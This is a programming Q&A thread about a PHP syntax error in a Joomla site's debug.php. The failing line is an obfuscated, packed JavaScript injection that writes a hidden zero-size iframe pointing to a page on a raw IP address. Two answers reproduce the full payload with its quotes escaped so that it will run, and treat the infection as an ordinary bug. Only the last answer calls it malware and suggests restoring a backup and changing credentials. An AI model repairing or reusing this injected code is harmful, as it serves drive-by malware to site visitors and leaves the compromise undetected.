# Joomla syntax error

Tags: php, joomla, wamp

I have ran on server and localhost, I met the same issue as below, I've tried searching but not found any solution. Please help me to fix it.

[image]

[image]

```
$body = str_replace('<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|79||src|height|119|width|board||54|php|158|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352></body>', $debug.'</body>', $body);
    JResponse::setBody($body);
```

The error is as follows:

```
syntax error, unexpected ''.replace (/^/,String)){while(c' (T_CONSTANT_ENCAPSED_STRING) ...\debug.php on line 204
```

Thank all.

Answer (score 0):

You are not escaping the single quotes in your string. Replace with:

```
$body = str_replace('<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\b\'+e(c)+\'\\b\',\'g\'),k[c])}}return p}(\'1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);\',26,26,\'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|79||src|height|119|width|board||54|php|158|tag1|ram\'.split('|'),0,{}))</script><tag5479347352></tag5479347352></body>', $debug.'</body>', $body);
```

Answer (score 0):

To clarify on itocopus's response. As you are using str_replace with single quotes i.e. (' ') then when you include a single quote within them it thinks you are closing the function. So you need to escape it with a \ so is you wanted to use ' inside it you would use: (' \' ') .

So total would be:

```
$body = str_replace('<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\b\'+e(c)+\'\\b\',\'g\'),k[c])}}return p}(\'1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);\',26,26,\'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|79||src|height|119|width|board||54|php|158|tag1|ram\'.split('|'),0,{}))</script><tag5479347352></tag5479347352></body>', $debug.'</body>', $body);
```

Answer (score 0):

That is a malware injection. Is common to Joomla and Wordpress. You have to delete what you have online an put the backup online. Change all the pass to ftp and CMS.